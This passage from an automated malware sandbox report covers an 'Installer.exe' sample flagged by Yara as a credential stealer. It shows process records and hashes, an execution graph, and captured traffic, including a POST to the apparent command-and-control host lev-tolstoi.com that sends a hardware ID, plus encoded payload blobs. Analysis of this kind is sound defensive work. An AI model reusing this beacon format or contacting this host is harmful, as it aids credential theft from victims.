                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: f1 e3 2e c9 c4 d2 7d 5d bf f3 c7 9f a1 4b 98 ee eb 27 7d 7b a2 0a 35 2f 12 f7 f7 00 fa 60 26 42 4b 82 98 f9 b2 a0 ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26
                                                                                                                                                                                                                                                  Data Ascii: .}]K'}{5/`&BK~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{*;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 10 4a 30 e7 f9 7a 3f b9 3e 42 2d 55 e9 b0 b6 b4 72 9d d6 78 39 f3 f7 93 73 a1 ed fb 02 38 47 cd 56 bc 10 1b 80 7d b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31
                                                                                                                                                                                                                                                  Data Ascii: J0z?>B-Urx9s8GV}E?@}36?>u%AnP|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y1
                                                                                                                                                                                                                                                  2024-12-27 22:13:45 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=1mi9bo7nq9ucm2i7mesokhvfgt; expires=Tue, 22 Apr 2025 16:00:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fhjotjI1C0ty16zBuBiIKuuCrmOUQQuBifCJxavW7Aaf8c2lsALcgUMrCAv9Zg%2Bu25ww8DFGLFlr%2F0EcH6yVMUl3FOznTOxEPZBO0kHRqyC%2Bmo%2BMiMGMnTr7lKO3z758O4M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca8ce8cbbc3f3-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1499&rtt_var=599&sent=322&recv=588&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573120&delivery_rate=1947965&cwnd=190&unsent_bytes=0&cid=e48b452039189119&ts=2454&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49747 | 104.21.66.86 | 443 | 7488 | C:\Users\user\Desktop\Installer.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                  2024-12-27 22:13:46 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 87
                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                  2024-12-27 22:13:46 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36 37 31 26 6a 3d 26 68 77 69 64 3d 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41
                                                                                                                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=yau6Na--5223198671&j=&hwid=4EAC7AD5F775DFB71441EDD8E05CE3DA
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 22:13:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=auv6u9fvmhooqmh3e2jcfi2i9g; expires=Tue, 22 Apr 2025 16:00:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RucthsARfeqtVHc2D8Sm5oRC0p7JrqkpFBiMrscAe1OW7woYl5U4%2B1dqD0i30vPYDfrbyuFRBJr5YprqfCpecsAYV4C0BgtCSFwU6Ts8YG0Q0RvYxARmzj9qSqVrsiLPn18%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8f8ca8e61da58cda-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1820&rtt_var=692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=986&delivery_rate=1569892&cwnd=242&unsent_bytes=0&cid=d675037ba59072d7&ts=776&x=0"
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC250INData Raw: 33 36 38 63 0d 0a 4a 43 74 54 6d 6e 61 6a 45 41 6b 78 37 79 4f 2f 6e 62 43 45 43 4f 6e 78 6e 6e 43 68 43 43 52 33 47 68 6e 77 67 68 48 35 67 4d 52 2f 55 48 48 38 41 6f 45 71 4f 42 33 4e 52 70 32 6e 67 61 67 71 6a 64 4f 6b 55 75 6c 74 46 55 39 65 64 4b 44 32 65 35 44 30 6f 46 34 64 50 74 4d 4d 37 43 64 34 5a 36 35 54 2b 61 36 49 74 30 4f 6c 6c 73 34 61 35 56 31 53 41 55 31 4f 70 76 42 65 77 63 71 56 55 46 77 43 31 53 2f 57 49 6b 5a 36 33 6b 33 76 37 4f 6e 75 52 64 36 45 37 69 58 69 59 33 77 52 59 48 71 66 39 31 44 53 7a 6f 70 33 41 47 72 41 4c 50 52 6a 50 6b 61 48 45 4d 76 37 38 62 46 69 33 71 69 71 41 76 6c 72 44 77 64 7a 56 49 72 33 4a 35 58 52 6a 33 5a 50 44 37 55 34 32 6e 6b 39 64 64 74 55 6a 74 47 48 74 57 4f 4e 6b 4f 51 47 34 6b 31 34
                                                                                                                                                                                                                                                  Data Ascii: 368cJCtTmnajEAkx7yO/nbCECOnxnnChCCR3GhnwghH5gMR/UHH8AoEqOB3NRp2ngagqjdOkUultFU9edKD2e5D0oF4dPtMM7Cd4Z65T+a6It0Olls4a5V1SAU1OpvBewcqVUFwC1S/WIkZ63k3v7OnuRd6E7iXiY3wRYHqf91DSzop3AGrALPRjPkaHEMv78bFi3qiqAvlrDwdzVIr3J5XRj3ZPD7U42nk9ddtUjtGHtWONkOQG4k14
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 57 46 5a 65 73 63 56 66 6f 2b 6a 76 66 68 4d 33 72 42 7a 6d 55 57 6f 61 78 48 50 34 30 49 4c 59 4a 39 37 44 71 69 48 32 57 33 59 56 57 58 75 67 7a 58 61 6f 78 70 4a 46 47 69 50 67 4a 4a 5a 69 57 41 53 7a 44 49 6a 50 36 4c 5a 6c 6b 63 66 33 4f 63 35 71 53 45 64 41 59 49 47 31 59 4c 62 52 6a 32 55 41 48 66 34 79 31 69 6c 54 65 72 68 4d 34 37 4c 48 37 57 57 76 74 39 6b 63 79 7a 39 39 51 32 68 42 6b 36 6c 68 6b 4d 4f 2b 55 52 30 62 7a 7a 54 78 58 6b 46 2f 6c 6b 6d 4c 32 59 54 7a 4f 61 76 47 72 78 7a 4e 61 56 34 42 57 56 47 57 73 79 6d 39 37 5a 51 64 51 54 72 75 45 74 6b 6d 5a 48 69 56 62 49 6a 73 34 73 56 34 76 38 4b 6d 51 2b 70 45 5a 53 64 77 57 73 44 30 5a 36 37 58 6b 6c 5a 6b 61 39 4d 55 6c 45 68 2b 66 72 59 49 6a 64 4c 37 74 54 71 50 67 4d 63 61 37 44 35
                                                                                                                                                                                                                                                  Data Ascii: WFZescVfo+jvfhM3rBzmUWoaxHP40ILYJ97DqiH2W3YVWXugzXaoxpJFGiPgJJZiWASzDIjP6LZlkcf3Oc5qSEdAYIG1YLbRj2UAHf4y1ilTerhM47LH7WWvt9kcyz99Q2hBk6lhkMO+UR0bzzTxXkF/lkmL2YTzOavGrxzNaV4BWVGWsym97ZQdQTruEtkmZHiVbIjs4sV4v8KmQ+pEZSdwWsD0Z67XklZka9MUlEh+frYIjdL7tTqPgMca7D5
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 73 48 4f 4a 73 6a 73 71 45 56 52 4a 64 6b 2b 78 69 45 78 64 59 4a 7a 79 2f 66 5a 38 47 79 54 78 2f 4d 35 32 30 63 54 42 6b 78 59 67 4d 51 69 77 62 4f 50 61 45 77 44 38 44 4c 32 5a 6e 39 6d 75 48 58 4e 30 6f 6a 4e 62 4e 36 70 36 54 2f 34 49 78 59 34 55 53 6a 44 30 6d 43 67 36 6f 6b 54 58 69 50 50 4e 63 68 49 62 30 75 4d 54 4d 72 63 6d 38 6c 47 75 74 71 6e 4b 76 74 66 56 30 42 74 63 63 50 32 64 37 69 31 72 68 4e 79 5a 2b 67 75 77 44 74 35 57 4b 4a 5a 79 71 76 63 31 55 4f 37 6c 63 4a 66 37 33 46 4e 51 31 34 74 68 37 4e 64 7a 72 47 6f 53 45 6f 70 37 44 58 72 64 54 67 4a 71 30 37 76 36 64 72 74 66 49 32 4c 71 42 33 6f 63 6d 74 41 61 30 2b 78 38 6c 66 4b 75 50 64 76 5a 7a 54 4b 48 4f 64 46 66 30 65 34 64 4f 6e 76 2f 37 78 42 6a 63 62 47 42 2b 35 52 44 30 56 56
                                                                                                                                                                                                                                                  Data Ascii: sHOJsjsqEVRJdk+xiExdYJzy/fZ8GyTx/M520cTBkxYgMQiwbOPaEwD8DL2Zn9muHXN0ojNbN6p6T/4IxY4USjD0mCg6okTXiPPNchIb0uMTMrcm8lGutqnKvtfV0BtccP2d7i1rhNyZ+guwDt5WKJZyqvc1UO7lcJf73FNQ14th7NdzrGoSEop7DXrdTgJq07v6drtfI2LqB3ocmtAa0+x8lfKuPdvZzTKHOdFf0e4dOnv/7xBjcbGB+5RD0VV
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 2b 66 2b 49 42 71 61 52 6e 54 44 35 64 55 50 51 58 5a 45 64 44 65 79 65 6b 38 6e 37 44 73 4a 4d 6c 44 59 45 39 4d 63 4b 72 7a 65 4b 57 76 6b 30 6b 66 59 64 73 44 30 46 52 6c 42 64 39 77 69 4d 6a 66 38 32 6d 5a 79 4e 77 58 6d 46 31 73 45 43 67 6f 75 39 64 70 76 62 4b 56 56 6d 59 63 30 67 58 6b 4a 54 74 38 75 57 6e 78 2b 76 6a 6e 63 71 79 6d 38 79 62 4e 61 31 4d 36 54 6e 4f 39 73 6c 57 2b 78 5a 4e 51 61 52 44 33 46 39 64 6e 63 57 58 65 56 49 61 6b 31 4c 64 76 72 36 6a 50 47 35 49 77 63 69 42 2b 59 37 37 6f 59 4e 4c 31 67 45 68 48 4a 4b 74 47 34 46 64 4c 65 62 4d 4d 38 4b 33 31 79 6e 6d 43 79 4e 49 35 38 32 5a 4d 4a 58 64 59 6c 63 64 56 6d 73 36 58 54 55 38 56 2f 6b 58 75 61 45 39 5a 69 6e 4c 50 72 49 4f 39 4f 70 71 69 32 53 6a 76 53 55 67 6c 61 45 36 6e 31
                                                                                                                                                                                                                                                  Data Ascii: +f+IBqaRnTD5dUPQXZEdDeyek8n7DsJMlDYE9McKrzeKWvk0kfYdsD0FRlBd9wiMjf82mZyNwXmF1sECgou9dpvbKVVmYc0gXkJTt8uWnx+vjncqym8ybNa1M6TnO9slW+xZNQaRD3F9dncWXeVIak1Ldvr6jPG5IwciB+Y77oYNL1gEhHJKtG4FdLebMM8K31ynmCyNI582ZMJXdYlcdVms6XTU8V/kXuaE9ZinLPrIO9Opqi2SjvSUglaE6n1
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 6e 45 47 4d 4c 39 51 2f 50 51 57 68 34 33 57 54 4a 35 4d 48 53 62 70 47 47 38 44 50 76 58 6e 35 42 56 6d 4f 47 77 56 53 56 38 4f 39 46 5a 41 72 75 45 63 49 37 55 45 75 65 54 76 62 4a 79 66 35 6e 32 36 62 53 52 76 64 76 56 44 30 75 53 72 2f 45 65 34 76 69 39 58 4a 43 4d 73 34 44 34 6c 31 76 61 4b 74 53 78 36 76 59 34 30 62 63 6e 36 77 41 36 6d 5a 67 49 43 35 34 6e 62 52 7a 73 66 65 7a 64 57 49 34 36 54 4c 6f 63 6c 39 6a 70 46 4c 31 72 75 65 30 61 70 36 57 72 52 6e 75 61 33 34 45 54 57 76 4a 7a 43 4f 39 37 71 64 30 62 6a 69 72 51 38 64 53 62 47 57 4c 66 35 44 54 34 72 59 35 74 64 37 2f 47 38 31 2b 45 56 78 56 63 35 7a 50 51 4d 44 77 69 6e 59 54 46 2f 63 34 38 48 52 39 59 6f 5a 75 2f 66 6d 62 79 58 43 73 70 2b 67 49 77 6d 4a 52 46 6d 39 71 6f 38 56 4a 74 38
                                                                                                                                                                                                                                                  Data Ascii: nEGML9Q/PQWh43WTJ5MHSbpGG8DPvXn5BVmOGwVSV8O9FZAruEcI7UEueTvbJyf5n26bSRvdvVD0uSr/Ee4vi9XJCMs4D4l1vaKtSx6vY40bcn6wA6mZgIC54nbRzsfezdWI46TLocl9jpFL1rue0ap6WrRnua34ETWvJzCO97qd0bjirQ8dSbGWLf5DT4rY5td7/G81+EVxVc5zPQMDwinYTF/c48HR9YoZu/fmbyXCsp+gIwmJRFm9qo8VJt8
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 46 63 74 46 38 45 49 78 63 4a 31 42 31 64 54 69 77 6d 32 48 77 65 73 5a 34 48 46 31 49 31 64 56 77 50 55 67 6d 2b 6d 53 66 68 30 66 34 41 44 67 64 54 73 46 72 6d 6e 6f 31 63 54 46 4f 4c 4f 58 36 78 7a 57 52 47 6b 56 61 33 79 57 31 6d 53 2f 39 61 56 52 57 41 44 64 4c 75 31 52 5a 57 4f 64 64 4f 6a 4c 77 73 73 77 6f 38 62 38 46 2b 42 42 61 6c 77 71 58 5a 47 7a 4f 73 2f 59 68 58 78 71 4a 4e 59 5a 35 30 63 2f 41 4c 6c 61 38 76 4c 46 34 30 75 4b 73 39 59 43 31 6c 68 4f 45 55 35 64 6f 4f 64 62 6a 50 57 46 61 45 59 66 77 7a 48 48 52 57 78 43 75 30 72 63 35 38 57 79 5a 4a 32 2b 38 6a 62 44 55 68 4d 65 58 46 36 33 74 6b 4b 44 77 71 30 50 53 54 2f 58 4a 4f 45 6a 53 32 48 65 57 39 44 73 38 75 64 47 75 70 6a 4d 49 50 5a 37 45 6a 42 35 4b 73 66 59 51 35 65 7a 2f 52 5a
                                                                                                                                                                                                                                                  Data Ascii: FctF8EIxcJ1B1dTiwm2HwesZ4HF1I1dVwPUgm+mSfh0f4ADgdTsFrmno1cTFOLOX6xzWRGkVa3yW1mS/9aVRWADdLu1RZWOddOjLwsswo8b8F+BBalwqXZGzOs/YhXxqJNYZ50c/ALla8vLF40uKs9YC1lhOEU5doOdbjPWFaEYfwzHHRWxCu0rc58WyZJ2+8jbDUhMeXF63tkKDwq0PST/XJOEjS2HeW9Ds8udGupjMIPZ7EjB5KsfYQ5ez/RZ
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 5a 45 37 54 48 61 49 5a 34 62 2b 31 38 4a 68 77 70 62 59 4a 64 56 4a 55 42 35 58 59 34 57 30 66 61 76 7a 76 45 31 4a 65 4f 77 63 38 6c 31 66 64 4b 46 70 33 64 65 4a 36 6b 79 4c 78 64 49 52 34 45 64 79 4e 58 64 56 68 4f 68 36 79 4e 50 30 5a 78 6b 61 34 44 6d 55 59 56 39 34 6a 47 2f 53 72 66 50 52 52 4b 57 66 33 54 54 30 66 6c 49 45 64 32 47 62 79 46 79 79 35 59 68 4b 48 68 62 63 51 4d 5a 53 5a 33 61 31 59 4d 66 32 31 66 56 71 75 35 58 36 46 65 70 38 64 78 68 30 54 37 6e 6c 55 38 33 59 69 33 52 5a 4d 76 63 66 36 55 41 39 51 64 74 77 38 71 37 46 73 45 71 5a 6c 64 41 6c 31 55 6c 51 48 6c 64 6a 68 62 52 39 71 73 71 78 56 6d 52 6d 37 52 65 51 56 57 39 32 6d 57 72 36 32 50 33 63 65 62 2f 41 7a 52 37 4a 62 42 4d 32 66 30 32 32 34 58 57 71 36 59 35 76 48 52 75 71
                                                                                                                                                                                                                                                  Data Ascii: ZE7THaIZ4b+18JhwpbYJdVJUB5XY4W0favzvE1JeOwc8l1fdKFp3deJ6kyLxdIR4EdyNXdVhOh6yNP0Zxka4DmUYV94jG/SrfPRRKWf3TT0flIEd2GbyFyy5YhKHhbcQMZSZ3a1YMf21fVqu5X6Fep8dxh0T7nlU83Yi3RZMvcf6UA9Qdtw8q7FsEqZldAl1UlQHldjhbR9qsqxVmRm7ReQVW92mWr62P3ceb/AzR7JbBM2f0224XWq6Y5vHRuq
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 30 49 71 30 54 58 39 65 50 52 52 72 72 61 77 6c 2f 30 55 58 4d 69 57 56 79 59 79 47 4f 42 39 2f 46 4f 48 41 4c 73 48 2f 5a 37 65 6c 79 47 51 4d 58 6f 36 72 64 76 72 4c 4c 59 49 2b 73 2f 54 6a 78 56 4b 6f 66 58 56 4a 76 4c 68 6b 78 78 48 2f 45 43 36 33 55 34 43 61 55 56 36 65 6a 54 77 48 79 36 70 63 74 43 36 48 4a 72 51 48 68 7a 78 4f 38 70 67 37 65 59 43 78 6f 6a 6f 68 72 53 61 48 70 57 6f 6c 4c 61 35 4d 72 2b 53 6f 61 43 31 44 4c 52 5a 32 59 75 62 48 61 79 31 46 32 6f 7a 4a 31 4f 5a 6d 54 76 42 76 5a 53 58 32 61 4e 56 50 76 75 32 4d 46 35 69 72 4c 72 48 64 68 52 53 43 46 57 59 34 54 65 50 72 58 56 74 6c 4e 6a 50 61 67 76 6d 32 4a 52 5a 4c 55 58 32 66 71 44 37 54 32 4e 73 76 6f 69 78 56 51 4c 4f 55 73 79 73 38 4e 54 6e 38 69 48 62 42 31 6c 6f 30 4c 58 58
                                                                                                                                                                                                                                                  Data Ascii: 0Iq0TX9ePRRrrawl/0UXMiWVyYyGOB9/FOHALsH/Z7elyGQMXo6rdvrLLYI+s/TjxVKofXVJvLhkxxH/EC63U4CaUV6ejTwHy6pctC6HJrQHhzxO8pg7eYCxojohrSaHpWolLa5Mr+SoaC1DLRZ2YubHay1F2ozJ1OZmTvBvZSX2aNVPvu2MF5irLrHdhRSCFWY4TePrXVtlNjPagvm2JRZLUX2fqD7T2NsvoixVQLOUsys8NTn8iHbB1lo0LXX
                                                                                                                                                                                                                                                  2024-12-27 22:13:47 UTC1369INData Raw: 52 6a 64 62 4b 34 6c 69 43 71 50 63 35 6c 6e 31 55 49 6b 42 79 70 2f 42 72 6d 4f 75 78 61 56 34 64 6f 69 57 57 4a 56 4e 77 75 46 66 37 36 74 6d 7a 66 4c 71 67 71 79 57 57 62 58 45 46 65 47 71 73 72 55 4f 51 79 34 78 52 47 44 2f 4c 54 2f 46 78 65 33 2b 65 63 49 71 76 68 4c 5a 77 70 63 4b 76 47 2b 56 70 46 43 73 31 57 71 72 6e 49 62 7a 45 72 48 78 66 4a 63 6b 46 7a 47 6f 38 51 4b 5a 54 38 4b 76 36 30 6b 2b 72 74 2b 73 39 6b 7a 39 6f 48 57 78 7a 6c 4e 64 6b 6e 64 65 53 46 56 6b 46 36 54 7a 50 4a 31 74 77 6f 47 62 77 72 2f 2b 33 52 4a 32 79 7a 52 4c 6d 4f 47 30 64 53 30 33 49 78 43 50 42 32 76 31 4e 65 57 58 39 41 2b 56 33 54 55 47 37 45 63 6e 6c 69 63 78 48 73 59 66 54 52 65 56 2b 46 30 4a 33 56 4b 4c 53 66 70 6a 51 69 42 5a 63 48 65 38 5a 77 46 31 6b 53 49
                                                                                                                                                                                                                                                  Data Ascii: RjdbK4liCqPc5ln1UIkByp/BrmOuxaV4doiWWJVNwuFf76tmzfLqgqyWWbXEFeGqsrUOQy4xRGD/LT/Fxe3+ecIqvhLZwpcKvG+VpFCs1WqrnIbzErHxfJckFzGo8QKZT8Kv60k+rt+s9kz9oHWxzlNdkndeSFVkF6TzPJ1twoGbwr/+3RJ2yzRLmOG0dS03IxCPB2v1NeWX9A+V3TUG7EcnlicxHsYfTReV+F0J3VKLSfpjQiBZcHe8ZwF1kSI


Target ID: 0
Start time: 17:13:20
Start date: 27/12/2024
Path: C:\Users\user\Desktop\Installer.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Installer.exe"
Imagebase: 0x340000
File size: 577'064 bytes
MD5 hash: 0CEBF27D0066D6EA5653547254E236E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 17:13:20
Start date: 27/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 17:13:21
Start date: 27/12/2024
Path: C:\Users\user\Desktop\Installer.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\Installer.exe"
Imagebase: 0x340000
File size: 577'064 bytes
MD5 hash: 0CEBF27D0066D6EA5653547254E236E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 17:13:21
Start date: 27/12/2024
Path: C:\Users\user\Desktop\Installer.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Installer.exe"
Imagebase: 0x340000
File size: 577'064 bytes
MD5 hash: 0CEBF27D0066D6EA5653547254E236E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835675481.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835591588.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835776038.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1874516417.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Execution Graph

Execution Coverage: 6.6%
Dynamic/Decrypted Code Coverage: 0.4%
Signature Coverage: 5.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 16
execution_graph
21311 353d73 21310->21311 21351 353de1 21310->21351 21354 353e59 21310->21354 21394 353fb2 21310->21394 21312 357f78 _Fputc 29 API calls 21311->21312 21313 353d8d 21312->21313 21314 357f78 _Fputc 29 API calls 21313->21314 21314->21304 21316 35bed7 ___free_lconv_mon 14 API calls 21315->21316 21317 353871 21316->21317 21318 35e774 21317->21318 21319 35476a 21318->21319 21320 35e77f 21318->21320 21319->21287 21320->21319 21688 3585b8 21320->21688 21323 35e742 _Fputc 21322->21323 21324 35e76c 21323->21324 21325 35f704 __fread_nolock 29 API calls 21323->21325 21324->21294 21326 35e75d 21325->21326 21336 36744f 21326->21336 21328 35e763 21328->21294 21330 35bf4f 21329->21330 21334 35bf1f __Getctype 21329->21334 21331 3576e4 __Wcrtomb 14 API calls 21330->21331 21333 35bf4d 21331->21333 21332 35bf3a RtlAllocateHeap 21332->21333 21332->21334 21333->21297 21334->21330 21334->21332 21335 355877 codecvt 2 API calls 21334->21335 21335->21334 21337 36745c 21336->21337 21338 367469 21336->21338 21339 3576e4 __Wcrtomb 14 API calls 21337->21339 21341 367475 21338->21341 21342 3576e4 __Wcrtomb 14 API calls 21338->21342 21340 367461 21339->21340 21340->21328 21341->21328 21343 367496 21342->21343 21344 357dcf __strnicoll 29 API calls 21343->21344 21344->21340 21346 353ac0 21345->21346 21347 353a9e 21345->21347 21429 3535fc 21346->21429 21348 357f78 _Fputc 29 API calls 21347->21348 21350 353ab9 21348->21350 21350->21302 21350->21304 21350->21310 21437 354dda 21351->21437 21353 353e1c 21353->21310 21355 353e77 21354->21355 21356 353e60 21354->21356 21359 357f78 _Fputc 29 API calls 21355->21359 21369 353eb6 21355->21369 21357 353fd6 21356->21357 21358 354042 21356->21358 21356->21369 21362 353fdc 21357->21362 21363 35406a 21357->21363 21360 354047 21358->21360 21361 354081 21358->21361 21364 353eab 21359->21364 21365 354049 21360->21365 21366 354078 21360->21366 21367 354086 21361->21367 21368 3540a0 21361->21368 21375 354037 21362->21375 21376 353fe1 21362->21376 21485 354b80 
